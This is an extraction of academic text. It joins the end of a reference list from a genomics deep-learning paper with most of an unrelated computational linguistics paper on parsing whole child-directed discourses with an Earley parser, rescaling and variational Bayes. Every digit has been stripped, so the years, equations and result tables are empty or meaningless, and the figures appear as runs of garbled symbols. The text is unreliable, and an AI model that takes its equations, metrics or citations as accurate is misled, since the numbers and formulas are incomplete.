h, garcia ea. . learning from imbalanced data. ieee transactions on knowledge and data engineering ( ): – doi . /tkde. . . jaganathan k, panagiotopoulou sk, mcrae jf, darbandi sf, knowles d, li yi, kosmicki ja, arbelaez j, cui w, schwartz gb. . predicting splicing from primary sequence with deep learning. cell ( ): – . kelley dr, reshef y, bileschi m, belanger d, mclean cy, snoek j. . sequential regulatory activity prediction across chromosomes with convolutional neural networks. genome research ( ): – . kelley dr, snoek j, rinn jl. . basset: learning the regulatory code of the accessible genome with deep convolutional neural networks. genome research ( ): – doi . /gr. . . khodabandelou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /ng http://dx.doi.org/ . /rsif. . https://keras.io http://dx.doi.org/ . /gad. http://dx.doi.org/ . /gr. http://dx.doi.org/ . /s - - -w http://dx.doi.org/ . /nature http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /gb- - - -r http://dx.doi.org/ . /tkde. . http://dx.doi.org/ . /gr. . http://dx.doi.org/ . /peerj-cs. kingma dp, ba j. . adam: a method for stochastic optimization. arxiv preprint. arxiv: . . kreyszig e. . advanced engineering mathematics. th eddition. wiley. kugel jf, goodrich ja. . finding the start site: redefining the human initiator element. genes & development ( ): – doi . /gad. . . kundaje a, meuleman w, ernst j, bilenky m, yen a, heravi-moussavi a, kheradpour p, zhang z, wang j, ziller mj. . integrative analysis of reference human epigenomes. nature ( ): – doi . /nature . leung mkk, xiong hy, lee lj, frey bj. . deep learning of the tissue-regulated splicing code. bioinformatics ( ):i –i doi . /bioinformatics/btu . min x, chen n, chen t, jiang r. . deepenhancer: predicting enhancers by con- volutional neural networks. in: bioinformatics and biomedicine (bibm), ieee international conference on. ieee, – . pachganov s, murtazalieva k, zarubin a, sokolov d, chartier dr, tatarinova tv. . transprise: a novel machine learning approach for eukaryotic promoter prediction. peerj :e doi . /peerj. . poplin r, chang pc, alexander d, schwartz s, colthurst t, ku a, newburger d, dijamco j, nguyen n, afshar pt. . a universal snp and small-indel vari- ant caller using deep neural networks. nature biotechnology ( ): – doi . /nbt. . rivera cm, ren b. . mapping human epigenomes. cell ( ): – doi . /j.cell. . . . rumelhart de, hinton ge, williams rj. . learning representations by back- propagating errors. nature ( ): – doi . / a . sandelin a, carninci p, lenhard b, ponjavic j, hayashizaki y, hume da. . mammalian rna polymerase ii core promoters: insights from genome-wide studies. nature reviews genetics ( ): – . sinha au, meller j. . cinteny: flexible analysis and visualization of synteny and genome rearrangements in multiple organisms. bmc bioinformatics ( ): doi . / - - - . srivastava n, hinton g, krizhevsky a, sutskever i, salakhutdinov r. . dropout: a simple way to prevent neural networks from overfitting. the journal of machine learning research ( ): – . stein l. . genome annotation: from sequence to biology. nature reviews genetics ( ): – . umarov rk, solovyev vv. . recognition of prokaryotic and eukaryotic promoters using convolutional deep learning neural networks. plos one ( ):e doi . /journal.pone. . vavouri t, lehner b. . human genes with cpg island promoters have a distinct transcription-associated chromatin organization. genome biology ( ): – doi . /gb- - - -r . wainberg m, merico d, delong a, frey bj. . deep learning in biomedicine. nature biotechnology ( ): doi . /nbt. . khodabandelou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://arxiv.org/abs/ . http://dx.doi.org/ . /gad. . http://dx.doi.org/ . /nature http://dx.doi.org/ . /bioinformatics/btu http://dx.doi.org/ . /peerj. http://dx.doi.org/ . /nbt. http://dx.doi.org/ . /j.cell. . . http://dx.doi.org/ . / a http://dx.doi.org/ . / - - - http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /gb- - - -r http://dx.doi.org/ . /nbt. http://dx.doi.org/ . /peerj-cs. waterston rh, lindblad-toh k, birney e, rogers j, abril jf, agarwal p, agar- wala r, ainscough r, alexandersson m, an p. . initial sequencing and comparative analysis of the mouse genome. nature ( ): – doi . /nature . wesolowska-andersen a, yu gz, nylander v, abaitua f, thurner m, torres jm, mahajan a, gloyn al, mccarthy mi. . deep learning models predict regulatory variants in pancreatic islets and refine type diabetes association signals. elife :e doi . /elife. . zhou j, troyanskaya og. . predicting effects of noncoding variants with deep learning–based sequence model. nature methods ( ): – doi . /nmeth. . zou j, huss m, abid a, mohammadi p, torkamani a, telenti a. . a primer on deep learning in genomics. nature genetics ( ): – . khodabandelou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /nature http://dx.doi.org/ . /elife. http://dx.doi.org/ . /nmeth. http://dx.doi.org/ . /peerj-cs. parsing entire discourses as very long strings: capturing topic continuity in grounded language learning minh-thang luong department of computer science stanford university stanford, california lmthang@stanford.edu michael c. frank department of psychology stanford university stanford, california mcfrank@stanford.edu mark johnson department of computing macquarie university sydney, australia mark.johnson@mq.edu.au abstract grounded language learning, the task of map- ping from natural language to a representation of meaning, has attracted more and more in- terest in recent years. in most work on this topic, however, utterances in a conversation are treated independently and discourse struc- ture information is largely ignored. in the context of language acquisition, this indepen- dence assumption discards cues that are im- portant to the learner, e.g., the fact that con- secutive utterances are likely to share the same referent (frank et al., ). the current pa- per describes an approach to the problem of simultaneously modeling grounded language at the sentence and discourse levels. we com- bine ideas from parsing and grammar induc- tion to produce a parser that can handle long input strings with thousands of tokens, creat- ing parse trees that represent full discourses. by casting grounded language learning as a grammatical inference task, we use our parser to extend the work of johnson et al. ( ), investigating the importance of discourse con- tinuity in children’s language acquisition and its interaction with social cues. our model boosts performance in a language acquisition task and yields good discourse segmentations compared with human annotators. introduction learning mappings between natural language (nl) and meaning representations (mr) is an important goal for both computational linguistics and cognitive science. accurately learning novel mappings is cru- cial in grounded language understanding tasks and such systems can suggest insights into the nature of children language learning. two influential examples of grounded language learning tasks are the sportscasting task, robocup, where the nl is the set of running commentary and the mr is the set of logical forms representing ac- tions like kicking or passing (chen and mooney, ), and the cross-situational word-learning task, where the nl is the caregiver’s utterances and the mr is the set of objects present in the context (siskind, ; yu and ballard, ). work in these domains suggests that, based on the co- occurrence between words and their referents in context, it is possible to learn mappings between nl and mr even under substantial ambiguity. nevertheless, contexts like robocup—where ev- ery single utterance is grounded—are extremely rare. much more common are cases where a sin- gle topic is introduced and then discussed at length throughout a discourse. in a television news show, for example, a topic might be introduced by present- ing a relevant picture or video clip. once the topic is introduced, the anchors can discuss it by name or even using a pronoun without showing a picture. the discourse is grounded without having to ground every utterance. moreover, although previous work has largely treated utterance order as independent, the order of utterances is critical in grounded discourse contexts: if the order is scrambled, it can become impossible to recover the topic. supporting this idea, frank et al. ( ) found that topic continuity—the tendency to talk about the same topic in multiple utterances that are contiguous in time—is both prevalent and informative for word learning. this paper examines the importance of topic continuity through a gram- matical inference problem. we build on johnson et al. ( )’s work that used grammatical inference to �������� ��� � ��� ��� � ��� ��� � ������ ���� ��� � ������ ���� ��� ��� ����� ���� � � ����� ���� ��� � �� � ��� � � ������ ��� � ��� ��� � ���� � ���� � ��� ��� ��� �� � ���� ��� ��� �� � ��� � ��� ��� ��� ���� ��� ��� ��� ��� � ��� ��� ��� �� �� � ������ ��� �� � ���� ������ ��� �� � ��� � ������ ��� ��� ���� ������ ��� ��� ��� � ������ ��� ��� �� �� ���������� ������������� � �������������� � figure : unigram social cue pcfgs (johnson et al., ) – shown is a parse tree of the input utterance “wheres the piggie” accompanied with social cue prefixes, indicating that the caregiver is holding a pig toy while the child is looking at it; at the same time, a dog toy is present in the screen. learn word-object mappings and to investigate the role of social information (cues like eye-gaze and pointing) in a child language acquisition task. our main contribution lies in the novel integra- tion of existing techniques and algorithms in parsing and grammar induction to offer a complete solution for simultaneously modeling grounded language at the sentence and discourse levels. specifically, we: ( ) use the earley algorithm to exploit the special structure of our grammars, which are deterministic or have at most bounded ambiguity, to achieve ap- proximately linear parsing time; ( ) suggest a rescal- ing approach that enables us to build a pcfg parser capable of handling very long strings with thou- sands of tokens; and ( ) employ variational bayes for grammatical inference to obtain better grammars than those given by the em algorithm. by parsing entire discourses at once, we shed light on a scientifically interesting question about why the child’s own gaze is a positive cue for word learn- ing (johnson et al., ). our data provide support for the hypothesis (from previous work) that care- givers “follow in”: they name objects that the child is already looking at (tomasello and farrar, ). in addition, our discourse model produces a perfor- mance improvement in a language acquisition task and yields good discourse segmentations compared with human annotators. related work supervised semantic parsers. previous work has developed supervised semantic parsers to map sen- tences to meaning representations of various forms, including meaning hierarchies (lu et al., ) and, most dominantly, λ-calculus expressions (zettle- moyer and collins, ; zettlemoyer, ; wong and mooney, ; kwiatkowski et al., ). these approaches rely on training data of annotated sentence-meaning pairs, however. such data are costly to obtain and are quite different from the ex- perience of language learners. grounded language learning. in contrast to se- mantic parsers, grounded language learning systems aim to learn the meanings of words and sentences given an observed world state (yu and ballard, ; gorniak and roy, ). a growing body of work in this field employs distinct techniques from a wide variety of perspectives from text-to-record align- ment using structured classification (barzilay and lapata, ; snyder and barzilay, ), iterative retraining (chen et al., ), and generative models of segmentation and alignment (liang et al., ) to text-to-interaction mapping using reinforcement learning (branavan et al., ; vogel and juraf- sky, ), graphical model semantics representa- tion (tellex et al., a; tellex et al., b), and combinatory categorial grammar (artzi and zettle- moyer, ). a number of systems have also used alternative forms of supervision, including sentences paired with responses (clarke et al., ; gold- wasser and roth, ; liang et al., ) and no supervision (poon and domingos, ; gold- wasser et al., ). recent work has also introduced an alternative approach to grounded learning by reducing it to a grammatical inference problem. börschinger et al. ( ) casted the problem of learning a semantic parser as a pcfg induction task, achieving state-of the art performance in the robocup domain. kim and mooney ( ) extended the technique to make it tractable for more complex problems. later, kim and mooney ( ) adapted discriminative rerank- ing to the grounded learning problem using a form of weak supervision. we employ this general gram- matical inference approach in the current work. children language acquisition. in the context of language acquisition, frank et al. ( ) proposed a system that learned words and jointly inferred speakers’ intended referent (utterance topic) using graphical models. johnson et al. ( ) used gram- matical inference to demonstrate the importance of social cues in children’s early word learning. we ex- tend this body of work by capturing discourse-based dependencies among utterances rather than treating each utterance independently. discourse parsing. a substantial literature has ex- amined formal representations of discourse across a wide variety of theoretical perspectives (mann and thompson, ; scha and polanyi, ; hobbs, ; lascarides and asher, ; knott and sanders, ). although much of this work was highly influential, marcu ( )’s work on dis- course parsing brought this task to special promi- nence. since then, more and more sophisticated models of discourse analysis have been developed:, e.g., (marcu, ; soricut and marcu, ; forbes et al., ; polanyi et al., ; baldridge and las- carides, ; subba and di eugenio, ; her- nault et al., ; lin et al., ; feng and hirst, ). our contribution to work on this task is to examine latent discourse structure specifically in grounded language learning. a grounded learning task our focus in this paper is to develop computational models that help us better understand children’s lan- guage acquisition. the goal is to learn both the long term lexicon of mappings between words and objects (language learning) as well as the intended topic of individual utterances (language comprehen- sion). we consider a corpus of child-directed speech annotated with social cues, described in (frank et al., ). there are a total of , utterances in the corpus, each of which is orthographically- transcribed from videos of caregivers playing with pre-linguistic children of various ages ( , , and months) during home visits. each utterance was hand-annotated with objects present in the (non-linguistic) context, e.g. dog and pig (fig- ure ), together with sets of social cues, one set per object. the social cues describe objects the care-giver is looking at (mom.eyes), holding onto (mom.hands), or pointing to (mom.point); sim- ilarly, for (child.eyes) and (child.hands). . sentence-level models motivated by the importance of social information in children’s early language acquisition (carpenter et al., ), johnson et al. ( ) proposed a joint model of non-linguistic information including the physical context and social cues, and the linguis- tic content of individual utterances. they framed the joint inference problem of inferring word-object mappings and inferring sentence topics as a gram- mar induction task where input strings are utterances prefixed with non-linguistic information. objects present in the non-linguistic context of an utterance are considered its potential topics. there is also a special null topic, none, to indicate non-topical ut- terances. the goal of the model is then to select the most probable topic for each utterance. top-level rules, sentence → topict wordst (unigram pcfg) or sentence → topict collocst (collocation adaptor grammar), are tai- lored to link the two modalities (t ranges over t ′, the set of all available topics (t ) and none). these rules enforce sharing of topics between prefixes (topict) and words (wordst or collocst). each word in the utterance is drawn from either a topic- specific distribution wordt or a general “null” dis- tribution wordnone. as illustrated in figure , the selected topic, pig, is propagated down to the input string through two paths: (a) through topical nodes until an object is caregivers were given pairs of toys to play with, e.g. a stuffed dog and pig, or a wooden car and truck. reached, in this case the .pig object, and (b) through lexical nodes to topical word tokens, e.g. piggie. so- cial cues are then generated by a series of binary decisions as detailed in johnson et al. ( ). the key feature of these grammars is that parameter in- ference corresponds both to learning word-topic re- lations and learning the salience of social cues in grounded learning. in the current work, we restrict our attention to only the unigram pcfg model to focus on investi- gating the role of topic continuity. unlike the ap- proach of johnson et al. ( ), which uses markov chain monte carlo techniques to perform gram- matical inference, we experiment with variational bayes methods, detailed in section . . a discourse-level model topic continuity—the tendency to group utterances into coherent discourses about a single topic—may be an important source of information for children learning the meanings of words (frank et al., ). to address this issue, we consider a new discourse- level model of grounded language that captures de- pendencies between utterances. by linking multiple utterances in a single parse, our proposed grammati- cal formalism is a bigram markov process that mod- els transitions among utterance topics. our grammar starts with a root symbol discourse, which then selects a starting topic through a set of discourse initial rules, discourse → discourset for t ∈ t ′. each of the discourset nodes generates an utter- ance of the same topic, and advances into other topics through transition rules, discourset → sentencet discourset′ for t′ ∈ t ′. dis- courses terminate by ending rules, discourset → sentencet. other rules in the unigram pcfg model by johnson are reused except for the top- level rules in which we replace the non-terminal sentence by topic-specific ones sentencet. . parsing discourses and challenges using a discourse-level grammar, we must parse a concatenation of all the utterances (with annota- tions) in each conversation. this concatenation re- sults in an extremely long string: in the social-cue corpus (frank et al., ), the average length of these per-recording concatenations is tokens (σ= ). parsing such strings poses many chal- lenges for existing algorithms. for familiar algorithms such as cyk, runtime quickly becomes enormous: the time complexity of cyk is o(n ) for an input of length n. fortunately, we can take advantage of a special structural prop- erty of our grammars. the shape of the parse tree is completely determined by the input string; the only variation is in the topic annotations in the nonter- minal labels. so even though the number of possi- ble parses grows exponentially with input length n, the number of possible constituents grows only lin- early with input length, and the possible constituents can be identified from the left context. these con- straints ensure that the earley algorithm (earley, ) will parse an input of length n with this gram- mar in time o(n). a second challenge in parsing very long strings is that the probability of a parse is the product of the probabilities of the rules involved in its derivation. as the length of a derivation grows linearly with the length of the input, the parse probabilities decrease exponentially as a function of sentence length, caus- ing floating-point underflow on inputs of even mod- erate length. the standard method for handling this is to compute log probabilities (which decrease lin- early as a function of input length, rather than ex- ponentially), but as we explain later (section ), we can use the ability of the earley algorithm to com- pute prefix probabilities (stolcke, ) to rescale the probability of the parse incrementally and avoid floating-point underflows. in the next section, we provide background in- formation on the earley algorithm for pcfgs, the prefix probability scheme we use, and the inside- outside algorithm in the earley context. background . earley algorithm for pcfgs the earley algorithm was developed by earley ( ) and known to be efficient for certain kinds of cfgs (aho and ullman, ). an earley parser the prefix markers # and ## and the topic markers such as “.dog” enable a left-to- right parser to unambiguously iden- tify its location in the input string. in order to achieve linear time the parsing chart must have suitable indexing; see aho and ullman ( ), leo ( ) and aycock and horspool ( ) for details. constructs left-most derivations of strings, using dot- ted productions to keep track of partial derivations. specifically, each state in an earley parser is rep- resented as [l,r]: x→α . β to indicate that input symbols xl, . . . ,xr− have been processed and the parser is expecting to expand β. states are gen- erated on the fly using three transition operations: predict (add states to charts), scan (shift dots across terminals), and complete (merge two states). fig- ure shows an example of a completion step which also illustrates the implicit binarization automati- cally done in earley algorithm. � � � � � � � � � � � � � � �� � � figure : completion step – merging two states [l,m]: x→α . y β and [m,r]:y →ν . to produce a new state [l,r]: x→αy . β. in order to handle pcfgs, stolcke ( ) extends the earley parsing algorithm to introduce the no- tion of an earley path being a sequence of states linked by earley operations. by establishing a one- to-one mapping between partial derivations and ear- ley paths, stolcke could then assign each path a derivation probability, that is the product of the all rule probabilities used in the predicted states of that path. here, each production x→ν corresponds to a predicted state [l, l] : x→. ν. besides parsing, being able to compute string and prefix probabilities by summing derivation probabil- ities is also of great importance. to compute these sums efficiently, each earley state is attached with a forward and an inner probability which are updated incrementally as new states are spawned by the three transition operations. . forward and prefix probabilities intuitively, the forward probability of a state [l,r]: x→α . β is the probability of an earley path through that state, generating input up to position r- . this probability generalizes a similar concept in hmm and lends itself to the computation of pre- fix probabilities, sums of forward probabilities over scanned states yielding a prefix x. computing prefix probabilities is important be- cause it enables probabilistic prediction of pos- sible follow-words xi+ as p(xi+ |x . . .xi) = p(x ...xixi+ ) p(x ...xi) (jelinek and lafferty, ). these conditional probabilities allow estimation of the in- cremental costs of a stack decoder (bahl et al., ). in (huang and sagae, ), a conceptu- ally similar prefix cost is defined to order states in a beam search decoder. moreover, the negative log- arithm of such conditional probabilities are termed as surprisal values in the psycholinguistics literature (e.g., hale, ; levy, ), to describe how dif- ficult a word is in a given context. interestingly, we show that prefix probabilities lead us to construct a parser that could parse extremely long strings next. . inside outside algorithm to extend the inside outside (io) algorithm (baker, ) to the earley context, stolcke introduced in- ner and outer probabilities which generalize the in- side and outside probabilities in the io algorithm. specifically, the inner probability of a state [l,r]: x→α . β is the probability of generating an input substring xl, . . . ,xr− from a non-terminal x using a production x→α β. � � � � � � � � � � � � � � �� � � figure : inner and outer probabilities. the outer probability of x→α . y β is a sum of all products of its parent outer probability (x→αy . β) and its sibling inner probability (y →ν .). similarly, the outer proba- bility of y →ν . is derived from the outer probability of x→αy . β and the inner probability of x→α . y β. once all inner probabilities have been populated in a forward pass, outer probabilities are derived backward, starting from the outer probability of the goal state [ ,n] :→ s . being . here, each earley state is associated with an outer probability which complements the inner probability by referring pre- cisely to those parts (not covered by the correspond- ing inner probability) of the complete paths generat- ing the input string x. the implicit binarization in summing up inner probabilities of all states y →ν . exactly yields baker’s inside probability for y . earley parsing allows outer probabilities to be accu- mulated in a similar way as its counterpart in the io algorithm (see figure ). these quantities allow for efficient grammatical inference in which the expected count of each rule x→λ given a string x is computed as: c(x→λ|x) = ∑ s:[l,r]x→.λ outer(s) · inner(s) p(s ⇒∗ x) . ( ) a rescaling approach for parsing our parser originated from the prefix probability parser by levy ( ), but has diverged markedly since then. the parser, called earleyx , is ca- pable of producing viterbi parses and performing grammatical induction based on the expectation- maximization and variational bayes algorithms. to tackle the underflow problem posed when parsing discourses (§ . ), we borrow the rescal- ing concept from hmms (rabiner, ) to extend the probabilistic earley algorithm. specifically, the probability of each earley path is scaled by a con- stant ci each time it passes through a scanned state generating the input symbol xi. in fact, each path passes through each scanned state exactly once, so we consistently accumulate scaling factors for the forward and inner probabilities of a state [l,r] : x→α . β as c . . .cr− and cl . . .cr− respectively. arguably, the most intuitive choice of the scal- ing factors are the prefix probabilities, which essen- tially resets the probability of any earley path start- ing from any position i to . concretely, we set c = p(x ) and ci = p(x ...xi− ) p(x ...xi) for i= , . . . ,n- where n is the input length. as noted in section § . , the logarithm of ci gives us the surprisal value for the input symbol xi. rescaling factors are only introduced in the for- ward pass, during which the outer probability of a state [l,r]: x→α . β has already been scaled by fac- tors c . . .cl− cr . . .cn− . more importantly, when parser code is available at http://nlp.stanford. edu/˜lmthang/earleyx. the outer probability of a state is essentially the product of inner probabilities covering all input symbols outside the span of that state. for grammars containing cyclic unit productions, we also need to multiply with terms from the unit-production relation matrix (stolcke, ). computing expected counts, scaling factors in the outer and inner terms cancel out with those in the string probability in eq. ( ), implying that rule prob- ability estimation is unaffected by rescaling. . parsing time on dense grammars we compare in table the parsing time (on a . ghz xeon cpu) of our parser (earleyx) and levy’s. the task is to compute surprisal values for a -word sentence over a dense grammar. given that our parser is now capable of performing scaling to avoid underflow, we avoid converting probabili- ties to logarithmic form, which yields a speedup of about times compared to levy’s parser. parser time (s) (levy, ) earleyx + scaling table : parsing time (dense grammars) – to compute surprisal values for a -word sentence using levy’s parser and ours (earleyx). . parsing time on sparse grammars parsing time on sparse grammars # words se co n d s figure : parsing time (sparse grammars) – to compute viterbi parses for sentences of increasing lengths. figure shows the time taken (as a function of the input length) for earleyx to compute a viterbi parses over our sparse grammars (§ . ). the plot confirmed our analysis in that the special structure of our grammars yields approximately linear parsing time in the input length (see § . ). mle estimated from the english penn treebank. grammar induction we employ a variational bayes (vb) approach to perform grammatical inference instead of the stan- dard inside outside (io) algorithm, or equivalently the expectation maximization (em) algorithm, for several reasons: ( ) it has been shown to be less likely to cause over-fitting for pcfgs than em (kurihara and sato, ) and ( ) implementation- wise, vb is a straightforward extension from em as they both share the same process of computing the expected counts (the io part) and only differ at how rule probabilities are reestimated. at the same time, vb has also been demonstrated to do well on large datasets and is competitive with gibbs samplers while having the fastest convergence time among these estimators (gao and johnson, ). the rule reestimation in vb is carried as fol- lows. let αr be the prior hyperparameter of a rule r in the rule set r and cr be its expected count accumulated over the entire corpus after an io iteration. the posterior hyperparameter for r is α∗r = αr + cr. let ψ be the digamma function, the rule parameter update formula is: θr:x→λ = exp [ ψ (α∗r) − ψ (∑ r′:x→λ′ α ∗ r′ )] . whereas io minimizes the negative log- likelihood of the observed data (sentences), -log p(x), vb minimizes a quantity called free energy, which we will use later to monitor con- vergence. here x denotes the observed data and θ represents the model parameters (pcfg rule probabilities). following (kurihara and sato, ), we compute the free energy as: f(x,θ) = − log p(x) + ∑ x∈n log Γ ( ∑ r:x→λ α ∗ r) Γ ( ∑ r:x→λ αr) − ∑ r∈r ( log Γ (α∗r) Γ (αr) + cr log θr ) where Γ denotes the gamma function. . sparse dirichlet priors in our application, since each topic should only be associated with a few words rather than the entire vocabulary, we impose sparse dirichlet priors over the wordt distributions by setting a symmetric prior α< for all rules wordt→w (∀t ∈ t,w ∈ w), where w is the set of all words in the corpus. this biases the model to select only a few rules per non- terminal wordt. for all other rules, a uniform hy- perparameter value of is used. we initialized rule probabilities with uniform distributions plus random noise. it is worthwhile to mention that sparse dirich- let priors were proposed in johnson ( )’s work that learns latent dirchlet allocation topic models using bayesian inference for pcfgs. experiments our experiments apply sentence- and discourse- level models to the annotated corpus of child- directed speech described in section . each model is evaluated on (a) topic accuracy—how many utter- ances are labeled with correct topics (including the null), (b) topic metrics (f-scores/precision/recall)— how well the model predicts non-null topical utter- ances, (c) word metrics—how well the model pre- dicts topical words, and (d) lexicon metrics—how well word types are assigned to the topic that they attach to most frequently. for example, in figure , the model assigns topic pig to the entire utterance. at the word level, it labels piggie with topic pig and assigns null topic to wheres and the. see (johnson et al., ) for more details of these metrics. in section . , we examine baseline models that do not make use of social cues (mother and child’s eye-gaze and hand position) to discover the topic; these baselines are contrasted with a range of social cues (§ . and § . ). in section . , we evaluate the discourse structures discovered by our models. . baseline models (no social cues) to create baselines for later experiments, we eval- uate our models without social information. we compare sentence-level models using three different inference procedures—markov chain monte carlo (mcmc) (johnson et al., ), expectation max- imization (em), and variational bayes (vb) —as well as the discourse-level model described above. it is important to not sparsify the wordnone distribution since wordnone could expand into many non-topical words. topics assigned by the model are compared with those given by the gold dictionary provided by (johnson et al., ). to determine the best sparsity hyperparameter α for lexical rules (§ . ), we performed a line search over { , . , . , . , . }. as α decreases, performance im- proves, peaking at . , the value used for all reported results model topic word lexicon energy acc. f p r f p r f p r mcmc . . . . . . . . . . vb . . . . . . . . . . discourse . . . . . . . . . . discourse+init . . . . . . . . . . table : social-cue models. comparison of sentence- and discourse-level models (init: initialized from the vb sentence-level model) over full metrics. free energies are shown to compare vb-based models. model acc. topic f word f lexicon f mcmc . . . . em . . . . vb . . . . discourse . . . . table : baseline (non-social) models. comparison of sentence-level models (mcmc (johnson et al., ), em, vb) and the discourse-level model. results in table suggest that incorporating topic continuity through the discourse model boosts performance compared to sentence-level models. within sentence-level models, em is inferior to both mcmc and vb (in accordance with the consensus that em is likely to overfit for pcfgs). comparing vb and mcmc, vb is significantly better at topic accuracy but is worse at topic f . this result sug- gests that vb predicts that more utterances are non- topical compared with mcmc, perhaps explaining why mcmc has the highest word f . nevertheless, unlike vb, the discourse model outperforms mcmc in all topic metrics, indicating that topic continuity helps in predicting both null and topical utterances. the discourse model is also capable of captur- ing topical transitions. examining one instance of a learned grammar reveals that the distribution un- der discourset is often dominated by a few major transitions. for example, car tends to have transi- tions into car ( . ) and truck ( . ); while pig prefers to transit into pig ( . ) and dog ( . ). these learned transitions nicely recover the struc- ture of the task that caregivers were given: to play with toy pairs like car/truck and pig/dog. . social-cue models we next explore how topic continuity interacts with social information via a set of simulations mirroring those in the previous section. results are shown in table . for the sentence-level models using social cues, vb now outperforms mcmc in topic accuracy and f , as well as lexicon evaluations, suggesting that vb is overall quite competitive with mcmc. turning to the discourse models, social informa- tion and topic continuity both independently boost learning performance (as evidenced in johnson et al. ( ) and in section . ). nevertheless, joint infer- ence using both information sources (discourse row) resulted in a performance decrement. rather than reflecting issues in the model itself, perhaps the in- creased complexity of the inference problem might have led to this performance decrement. to test this explanation, we initialized our discourse-level model with the vb sentence-level model. results are shown in the discourse+init row. with a sentence-level initialization, perfor- mance improved substantially, yielding the best re- sults over most metrics. in addition, the discourse model with sentence-level initialization achieved lower free energy than the standard initialization dis- course model. both of these results support the hy- pothesis that initialization facilitated inference in the more complex discourse model. from a cognitive science perspective, this sort of result may point to the utility of beginning the task of discourse segmen- tation with some initial sentence-level expectations. . effects of individual social cues the importance of particular social cues and their relationship to discourse continuity is an additional topic of interest from the cognitive science per- spective (frank et al., ). returning to one of the questions that motivated this work, we can use detailed breakdown of word f-scores reveals that mcmc is much better at precision, indicating that vb predicts more words as topical than mcmc. an explanation for such effect is that we use the same α for all lexical rules, which results in suboptimal sparsity levels for wordt distributions. for mcmc, johnson et al. ( ) used the adaptor grammar software to learn the hyperparameters automatically from data. all no.child.eyes no.child.hands no.mom.eyes no.mom.hands no.mom.point mcmc . / . / . / . . / . / . / . . / . / . / . . / . / . / . . / . / . / . . / . / . / . vb . / . / . / . . / . / . / . . / . / . / . . / . / . / . . / . / . / . . / . / . / . discourse+init . / . / . / . . / . / . / . ∗+ . / . / . / . + . / . / . / . . / . / . / . . / . / . / . table : social cue influence. ablation test results across models without discourse (mcmc, vb) and with discourse (discourse+init). we start with the full set of social cues and drop one at a time. each cell contains results for metrics: topic accuracy/topic f /word f /lexicon f . for row discourse+init, we compare models with/without a social cue using chi-square tests and denote statistically significant results (p < . ) at the utterance (∗) and word (+) levels. none child.eyes child.hands mom.eyes mom.hands mom.point mcmc . / . / . / . . / . / . / . . / . / . / . . / . / . / . . / . / . / . . / . / . / . vb . / . / . / . . / . / . / . . / . / . / . . / . / . / . . / . / . / . . / . / . / . discourse . / . / . / . . / . / . / . ∗+ . / . / . / . ∗+ . / . / . / . ∗+ . / . / . / . + . / . / . / . ∗+ table : social cue influence. add-one test results across models without discourse (mcmc, vb) and with discourse (discourse). we start with no social information and add one cue at a time. each cell contains results for metrics: topic accuracy/topic f /word f /lexicon f . for row discourse, we compare models with/without a social cue using chi-square tests and denote statistically significant results (p < . ) at the utterance (∗) and word (+) levels. our discourse model to answer the question about the role that the child.eyes cue plays in child- directed discourses. johnson et al. ( ) raised two hypotheses that could explain the importance of child.eyes as a social cue: ( ) caregivers “fol- low in” on the child’s gaze: they tend to talk about what the child is looking at (baldwin, ), or ( ) the child.eyes cue encodes the topic of the pre- vious sentence, inadvertently giving a non-discourse model access to rudimentary discourse information. to address this question, we conduct two tests: ( ) ablation – eliminating each social cue in turn (e.g. child.eyes), and ( ) add-one, using a sin- gle social cue per turn. table and show corre- sponding results for models without discourse (the mcmc and vb sentence-level models) and with discourse (discourse+init for the ablation test and discourse for the add-one test). we observe simi- lar trends to johnson et al. ( ): the childs gaze is the most important cue. removing it from the full model with all social cues or adding it to the base model with no cues both result in the largest perfor- mance change; in both cases this change is statisti- cally reliable. the large performance differences for child.eyes are consistent with the hypothe- sis that caregivers are following in, or discussing the object that children are interested in – even control- it is somewhat surprising when child.eye has much less influence on vb than on mcmc in the ablation test. though re- sults in the add-one test reveal that vb generalizes much better than mcmc when presented with a single social cue, it remains interesting to find out internally what causes the difference. ling for the continuity of discourse, a confound in previous analyses. in other words, the importance of child.eyes in the discourse model suggests that this cue encodes useful information in addition to the intersentential discourse topic. . discourse structure evaluation while the discourse model performs well using met- rics from previous work, these metrics do not fully reflect an important strength of the model: its abil- ity to capture inter-utterance structure. for exam- raw discourse utterance car car come here lets find the car car there car car is that a car car car the car goes vroom vroom vroom table : topic annotation examples. raw (previous metrics) and discourse (new metrics). ple, consider the sequence of utterances in table . our previous evaluation is based on the raw annota- tion, which labels as topical only utterances contain- ing topical words or pronouns referring to an object. as a result, classifying “there” as car is incorrect. from the perspective of a human listener, however, “there” is part of a broader discourse about the car, and labeling it with the same topic captures the fact that it encodes useful information for learners. to differentiate these cases, frank and rohde (under re- view) added a new set of annotations (to the dataset used in section ) based on the discourse structure perceived by human, similar to column discourse, . we utilize these new annotations to judge topics predicted by our discourse model and adopt previ- ous metrics for discourse segmentation evaluation: a=b, a simple proportion equivalence of discourse assignments; pk, a window method (beeferman et al., ) to measure the probability of two random utterances correctly classified as being in the same discourse; and windowdiff (pevzner and hearst, ), an improved version of pk which gives “par- tial credit” to boundaries close to the correct ones. results in table demonstrate that our model is in better agreement with human annotation (model- human) than the raw annotation (raw-human) across all metrics. as is visible from the limited change in the a=b metric, relatively few topic assignments are altered; yet these alterations create much more coherent discourses that allow for far better segmen- tation performance under pk and windowdiff. raw-human model-human a=b . . pk . . windowdiff . . table : discourse evaluation. single annotator sample, comparison between topics assigned by the raw annota- tion, our discourse model, and a human coder. to put an upper bound on possible discourse seg- mentation results, we further evaluated performance on a subset of utterances for which multiple an- notations were collected. results in table demon- strate that our model predicts discourse topics (m-h , m-h ) at a level quite close to the level of agreement between human annotators (column h -h ). r-h r-h m-h m-h h -h a=b . . . . . pk . . . . . windowdiff . . . . . table : discourse evaluation. multiple annotator sam- ple, comparison between raw annotations (r), our model (m), and two independent human coders (h , h ). conclusion and future work in this paper, we proposed a novel integration of existing techniques in parsing and grammar induc- tion to offer a complete solution for simultaneously modeling grounded language at the sentence and discourse levels. specifically, we used the ear- ley algorithm to exploit the special structure of our grammars to achieve approximately linear parsing time, introduced a rescaling approach to handle very long input strings, and utilized variational bayes for grammar induction to obtain better solutions than the expectation maximization algorithm. by transforming a grounded language learning problem into a grammatical inference task, we used our parser to study how 